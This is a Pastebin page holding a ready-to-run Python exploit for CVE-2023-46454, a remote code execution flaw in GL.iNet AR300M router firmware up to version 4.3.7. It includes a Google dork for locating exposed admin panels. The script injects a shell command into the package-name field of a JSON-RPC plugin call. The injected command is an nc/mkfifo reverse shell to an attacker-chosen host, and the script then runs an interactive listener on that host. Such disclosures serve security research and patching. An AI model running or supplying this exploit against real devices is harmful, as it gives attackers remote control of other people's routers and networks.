Advertisement
FlyFar

GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454

Mar 6th, 2024
845
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.94 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. # Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
  4. # Google Dork: intitle:"GL.iNet Admin Panel"
  5. # Date: XX/11/2023
  6. # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
  7. # Vendor Homepage: https://www.gli-net.com
  8. # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
  9. # Version: 4.3.7
  10. # Tested on: GL.iNet AR300M
  11. # CVE: CVE-2023-46454
  12.  
  13. import socket
  14. import requests
  15. import readline
  16. from time import sleep
  17. from random import randint
  18. from sys import stdout, argv
  19. from threading import Thread
  20.  
  21. requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
  22.  
  23. def trigger_revshell(url, auth_token, payload):
  24.     sleep(0.25)
  25.     data = {
  26.         'jsonrpc': '2.0',
  27.         'id': randint(1000, 9999),
  28.         'method': 'call',
  29.         'params': [
  30.             auth_token,
  31.             'plugins',
  32.             'get_package_info',
  33.             {'name': 'bas{}e-files'.format(payload)}
  34.         ]
  35.     }
  36.     requests.post(url, json=data, verify=False)
  37.  
  38. def get_command_response(s):
  39.     res = ''
  40.     while True:
  41.         try:
  42.             resp = s.recv(1).decode('utf-8')
  43.             res += resp
  44.         except UnicodeDecodeError:
  45.             pass
  46.         except socket.timeout:
  47.             break
  48.     return res
  49.  
  50. def revshell_listen(revshell_ip, revshell_port):
  51.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  52.     s.settimeout(5)
  53.  
  54.     try:
  55.         s.bind((revshell_ip, int(revshell_port)))
  56.         s.listen(1)
  57.     except Exception as e:
  58.         print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
  59.         exit(1)
  60.  
  61.     try:
  62.         clsock, claddr = s.accept()
  63.         clsock.settimeout(2)
  64.         if clsock:
  65.             print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
  66.             res = ''
  67.             while True:
  68.                 command = input('$ ')
  69.                 clsock.sendall('{}\n'.format(command).encode('utf-8'))
  70.                 stdout.write(get_command_response(clsock))
  71.  
  72.     except socket.timeout:
  73.         print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
  74.         s.close()
  75.  
  76.     except KeyboardInterrupt:
  77.         print('\n[*] Closing connection')
  78.         try:
  79.             clsock.close()
  80.         except socket.error:
  81.             pass
  82.         except NameError:
  83.             pass
  84.         s.close()
  85.  
  86. def main(base_url, auth_token, revshell_ip, revshell_port):
  87.     print('[+] Started GL.iNet <= 4.3.7 RCE exploit')
  88.  
  89.     payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
  90.     print('[+] Reverse shell payload: "{}"'.format(payload))
  91.  
  92.     print('[*] Triggering reverse shell connection')
  93.     Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()
  94.  
  95.     print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
  96.     revshell_listen(revshell_ip, revshell_port)
  97.  
  98.     print('[+] Done')
  99.  
  100. if __name__ == '__main__':
  101.     if len(argv) < 5:
  102.         print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
  103.         exit(1)
  104.  
  105.     main(argv[1], argv[2], argv[3], argv[4])
  106.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement